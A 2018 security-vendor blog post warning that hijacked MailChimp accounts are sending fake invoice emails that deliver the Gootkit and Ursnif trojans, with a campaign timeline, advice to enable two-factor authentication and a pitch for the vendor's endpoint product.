Security Alert
Jonathan Crowe
Mar 2018

Alert: Malware Being Spread via MailChimp

mail-chimp-malware-campaigns

An increasing number of hijacked MailChimp accounts are being used to distribute spam emails and malware. Here's what you need to know.

Key Details

  • What's happening: Criminals are using compromised MailChimp accounts to blast spam emails designed to infect victims with malware.
  • Using MailChimp helps spam campaigns bypass email filters: Because MailChimp is such a well-established email marketing provider (the company has millions of customers and distributes more than 1 billion emails per day), it's less likely for these emails to get caught in spam filters.
  • Campaigns have been launching at an increasing rate since last November: Spam emails were first seen being distributed via compromised MailChimp accounts located in Australia in November 2017. Campaigns were next spotted in Italy in January, quickly followed by more campaigns launched from compromised UK and US companies in February and March. 
  • Emails linking to fake invoice files: The majority of the emails are linking to .zip files that contain .js files, which in turn download the malware payload. Other examples leverage BITSAdmin, a legitimate Windows data-transfer tool, to download the payload.
  • The malware being distributed is primarily Gootkit, a sophisticated banking trojan: Gootkit has a long, successful history of stealing passwords and other sensitive information. It has a wide range of capabilities and is notorious for its ability to evade detection from antivirus software, sandboxes, and other security solutions.
  • It's unclear how MailChimp accounts are being compromised: Experts believe the most likely explanation is that criminals are taking advantage of weak, stolen, and/or reused passwords. 
  • Barkly protects users from these attacks: Barkly blocks Gootkit and malware like it thanks to its uniquely accurate file analysis powered by machine learning.
  • empty

Don't let user mistakes keep you up at night. Protect your company from the latest attacks with Barkly.
Find out how

Criminals are always looking for new opportunities to distribute malware, and now they appear to be abusing MailChimp — one of the most popular email marketing service providers — to do it. 

Researchers are seeing an increasingly number of spam email campaigns being sent from compromised MailChimp accounts. The emails are often disguised as fake invoice notifications and contain links to .zip attachments that, when opened, launch JavaScript files that download a malware payload. 

In the majority of campaigns, that malware has been Gootkit, a dangerous banking trojan outfitted with a variety of information-stealing capabilities (including keylogging, screen recording, and web injections) and notoriously designed for persistence and stealth. 

Researcher Derek Knight (@dvk01uk, My Online Security) has been tracking these spam campaigns closely, beginning with emails he spotted in mid-January. He's watched them ramp up in frequency to become a near-daily occurance in late February and early March.

Each campaign has introduced small variations, with criminals experimenting with different subject lines, body copy, and malware delivery mechanisms (for more details, see the timeline below). The criminals behind these campaigns are regularly iterating in order to further optimize their success rates, but the one thing they're not changing — the one thing that's definitively working — is sending these emails from compromised MailChimp accounts. Not only is it a "free" way for these criminals to amplify their reach, it's also helping them get them past email filters.

Why taking control of MailChimp accounts is a dangerous (and obvious) move for criminals

As a spammer, your general goal is obviously to get your emails in front of as many prospective victims as possible. That requires mass distribution, and one of the most tried-and-true options is renting access to a botnet (a network of compromised computers), and using it to send out your spam emails for you.

The upside of utilizing a botnet is it can seriously amplify your reach. For example, some of the most prevalent malware of the past few years (Locky ransomware and the Dridex banking trojan) both relied on distribution from the Necurs botnet in order to send out millions and millions of emails.   

The downside, of course, is using a botnet costs money. It can also be surprisingly competitive. 

The criminals behind these MailChimp campaigns have stumbled across an incredibly effective alternative. By compromising MailChimp customers — either by taking advantage of weak passwords or tricking users into handing them over via phishing attempts — criminals can use their accounts to blast out thousands and thousands of spam emails for them. 

End result: In addition to hijacking the distribution power of MailChimp, these operations are reaping an additional benefit — unlike emails sent from botnets, these are being distributed via a trusted sender. 

It's enough to make criminals ask themselves, who needs a botnet when you have compromised MailChimp accounts?

What these emails look like

As detailed in the timeline below, the emails being sent in these campaigns have varied slightly from day to day and week to week. In general, the vast majority have been disguised as invoice notifications, with links to hosted .zip files rather than those files being attached (additionally helping them bypass email filters). 

As shown in the following two examples, the emails often appear to be coming "on behalf of" an individual/organization associated with the invoice, though in some cases, the sender email address isn't a direct match. 

MailChimp-spam-AZHomes.jpg

Fake invoice notice sent from AZ Homes List via a compromised MailChimp account.
Source: My Online Security

 

MailChimp-spam-City-Sign-and-Graphics.jpg

Fake invoice notice sent from City Sign & Graphics, LTD via a compromised MailChimp account.
Source: My Online Security 

250,000 spam emails sent from one compromised account — what these hijacks look like from the MailChimp account owner's perspective 

According to reports Knight has received, once criminals have gained access to a MailChimp account they either replace the victim's subscriber list with a list of their own target email addresses, or they simply upload the additional list of target email addresses so that both lists receive the spam campaign. 

A comment left on My Online Security paints a more detailed picture:

My Mailchimp account got breached, no malware on any pc used to access the service, no login sharing, altough Two-Factor wasn’t setup (It is since the breach). I knew of the breach because my main admin got a notification email from Mailchimp at 2AM saying a 250k subscriber list was successfully imported (my normal list is of about 6k), so the attackers just import their own list into the breached account and sent it thorough there, and then just delete the sent campaign.

MailChimp account owners should be on high alert for any suspicious list uploads and/or email activity. To avoid having their accounts hijacked in the first place, experts are also urgently recommending account owners to utilize two-factor authentication (2FA). Instructions from MailChimp on enabling 2FA can be found here.

MailChimp malware campaigns timeline

The first signs of criminals hijacking MailChimp accounts actually dates back to November 2016, when researcher Troy Hunt reported he had received a fake invoice email notification from the news site Business News Australia. 

Soon after, reports surfaced of similar emails from a variety of Australian organizations, including a Brisbane comedy club and a building inspection company

In these early cases, it appears the criminals were simply sending out spam emails to the compromised organizations' mailing lists. That's something that would change when new emails began being sent from compromised Italian organizations this January. In these campaigns, criminals appear to have avoided sending the spam emails to the organizations' mailing lists, choosing to upload their own list of email addresses, instead.

Instead of fake invoice notifications, the emails were disguised as Italian tax notices sent from the Ministero dell’Economia e delle Finanze. 

mailchimp-malware-campaigns-timeline-2018-1.png

A few days later, Knight began tracking new campaigns taking advantage of compromised UK and US organizations on My Online Security, noting for the first time that the malware being distributed was the Gootkit trojan.  

On January 19, spam emails were reported being sent from Sage Pay. The emails were disguised as fake invoice notifications and included a link to a .zip file. Once opened, the .zip file launched JavaScript that downloaded the Gootkit payload. 

On February 22, new campaigns were spotted being sent from organizations including Infinity Cottage and Cosmic Intelligence. In addition to including a link pointing to a .zip attachment, these emails also included a link to a macro-enabled Word document that downloaded a .scr file (which runs as an .exe on Windows computers). 

Days later, on February 26 and 27, criminals were back at it, though they apparently decided to drop the second link to the Word document and go back to including just one link to a booby-trapped .zip file. 

Changes came on March 1, when criminals switched to delivering the Ursnif trojan and changed up the deployment routine slightly. Instead of including JavaScript in the .zip file, they were now including a Windows shortcut file that downloaded the malware payload using the legitimate Microsoft data-transfering tool BITS (bitsadmin.exe) — a technique Barkly recently saw utilized in a separate spam campaign distributing the Smoke Loader trojan

By March 5 and 6 criminals were back to distributing Gootkit, though it does appear they are still utilizing BITS. 

After a brief lull, new campaigns were launched on March 12, following what (for the moment, anyhow) appears to be a fairly stable pattern of fake invoice email --> link to .zip file containing .lnk file --> download Gootkit using bitsadmin.exe. 

What to do now

This has unfortunately become a very active criminal operation that requires preventative action from all of us in order to make it go away.  

MailChimp account owners:

If they haven't already, MailChimp users need to enable two-factor authentication (2FA) now. That will require anyone attempting to log in to an account to also submit a verification code often sent to a mobile device or separate email not associated with the account. As mentioned above, MailChimp has provided instructions for enabling 2FA here

As the extent of this abuse continues to grow, MailChimp should also consider making 2FA enabled by default. That could potentially have a dramatic effect on reducing these attacks. 

Everyone else:

For the rest of us, the usual advice of informing end users about this threat and training them not to open attachments they're not expecting is key. 

But companies can avoid putting all the pressure on employees by ensuring they're properly protected by modern endpoint protection designed to block even the newest malware antivirus solutions routinely miss. 

Barkly blocks GootKit and other malware payloads before they can do any damage

Gootkit.gif

Mistakes happen, and users routinely fall for spam and phishing emails, despite regular training. Barkly serves as an effective safety net for users, blocking the Gootkit samples being distributed in these campaigns before the malware can successfully execute. 

Find out how Barkly can protect your organization and why you need endpoint security that goes beyond AV.

Jonathan Crowe

Jonathan Crowe

Jonathan covers the latest threats and cybersecurity trends from a practical point of view.

lock-white.png

Close the gaps in your security

Stop paying for AV, get the strongest protection instead. See how Barkly blocks attacks that are getting past AV.

See a demo

Comments

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.